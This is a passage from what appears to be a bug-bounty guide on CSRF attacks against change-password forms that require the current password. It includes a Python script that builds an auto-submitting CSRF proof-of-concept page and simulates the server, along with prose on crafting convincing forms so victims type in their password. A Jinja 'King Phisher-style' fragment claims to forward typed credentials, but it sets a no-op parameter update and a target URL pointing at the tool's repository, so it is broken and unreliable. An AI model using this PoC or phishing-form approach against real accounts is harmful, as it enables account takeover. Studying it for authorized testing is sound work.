Avoiding problems with authentication

Practically all CSRF attacks depend on the victim's session: it must already be established so that the forged request is performed with the privileges of the victim's profile. However, as we reviewed in the section on unsafe protections, some developers require an extra confirmation before performing certain actions.

One of the most common features that requires this kind of confirmation is the change-password functionality. A CSRF attack may be able to submit a new password, but the application can ask for the current password before accepting the change. This confirmation is, in effect, a second authentication.

In these cases, the form used to exploit the vulnerability also has to ask the victim for the password the application will check, and submit it together with the rest of the request. You can use the following code (a King Phisher-style template fragment) to add this functionality:

{# CSRF #}
{# The CSRF flag and target URL are set for the page being served. #}
{% set csrf = false %}
{% set target_url = 'https://github.com/securestate/king-phisher' %}

{# Copy the credentials the victim typed into the form into the request
   parameters, so they are sent along with the forged request.
   The 'do' tag requires the jinja2.ext.do extension. #}
{% do
  request.parameters.update({
    'username': request.parameters['username'],
    'password': request.parameters['password']
  })
%}

From the bug bounty hunter's point of view this is not a problem, because you know your own current password and only need to confirm that the attack is possible. The problem is for malicious users, who do not know the victim's current password and therefore need to create forms that look real to the victim, so that the victim types it in without becoming suspicious.
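The following is an added example, not code from the book or from King Phisher. It builds an auto-submitting CSRF proof-of-concept page for a change-password form and then simulates the server side to show why a "current password" check stops the forged request unless the attacker also obtains that password. The target URL, the field names, the victim account and the simplified handler are all assumptions constructed for the example.

```python
"""
Added example (not from the book or from King Phisher).

1. build_csrf_poc() produces the HTML an attacker would host: a hidden form
   that posts attacker-chosen fields to the target and submits itself.
2. change_password() is a simulated server handler. Without re-authentication
   it trusts the session cookie alone, so the forged request succeeds. With
   require_current=True it also demands the current password, which a CSRF
   page cannot know.

All names, URLs and values below are assumptions constructed for the example.
"""
import hashlib
import html
from typing import Dict, Optional

# Assumed target endpoint; not a real site.
TARGET_URL = "https://target.example/account/password"


def build_csrf_poc(target_url: str, params: Dict[str, str], method: str = "POST") -> str:
    """Return an HTML page whose form auto-submits `params` to `target_url`.

    Every name, value and the URL are HTML-escaped so a quote inside a value
    cannot break out of the attribute and corrupt the form.
    """
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(name, quote=True)}" '
        f'value="{html.escape(value, quote=True)}">'
        for name, value in params.items()
    )
    return (
        "<html><body>\n"
        f'  <form id="csrf" method="{method}" '
        f'action="{html.escape(target_url, quote=True)}">\n'
        f"{inputs}\n"
        "  </form>\n"
        "  <script>document.getElementById('csrf').submit();</script>\n"
        "</body></html>\n"
    )


def _hash(password: str) -> str:
    # Toy hash for the simulation only; a real application uses a slow
    # password hash such as bcrypt or Argon2.
    return hashlib.sha256(password.encode()).hexdigest()


def change_password(users: Dict[str, str], sessions: Dict[str, str],
                    session_cookie: str, form: Dict[str, str],
                    require_current: bool) -> bool:
    """Simulated change-password handler. Returns True if the password changed.

    The browser attaches `session_cookie` automatically, which is what CSRF
    relies on. `form` is whatever the (possibly forged) request carried.
    """
    user = sessions.get(session_cookie)
    if user is None:
        return False
    new_pw = form.get("new_password", "")
    if not new_pw or new_pw != form.get("confirm_password"):
        return False
    if require_current:
        # Re-authentication: the request must prove knowledge of the current
        # password, not just possession of the session cookie.
        current = form.get("current_password")
        if current is None or _hash(current) != users[user]:
            return False
    users[user] = _hash(new_pw)
    return True


def attacker_params(guessed_current: Optional[str] = None) -> Dict[str, str]:
    """Fields the attacker's PoC submits. The current password is only
    present if the attacker has somehow obtained it (e.g. by phishing)."""
    params = {"new_password": "pwned123", "confirm_password": "pwned123"}
    if guessed_current is not None:
        params["current_password"] = guessed_current
    return params


def simulate_attack(require_current: bool, guessed_current: Optional[str] = None) -> bool:
    """Run one forged request against a fresh constructed victim account."""
    users = {"victim": _hash("Winter2024!")}      # constructed sample account
    sessions = {"sess-abc123": "victim"}           # constructed live session
    return change_password(users, sessions, "sess-abc123",
                           attacker_params(guessed_current), require_current)


if __name__ == "__main__":
    print(build_csrf_poc(TARGET_URL, attacker_params()))
    print("no re-auth, forged request accepted:", simulate_attack(False))
    print("re-auth required, unknown password :", simulate_attack(True))
    print("re-auth required, phished password :", simulate_attack(True, "Winter2024!"))
```

For a bounty report you can run the PoC against your own account and fill in `current_password` yourself; the third simulation is exactly that case. The second simulation is the attacker's situation from the text: the forged request carries the victim's cookie but fails because the current password is missing, which is why the page has to be convincing enough for the victim to type it in.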
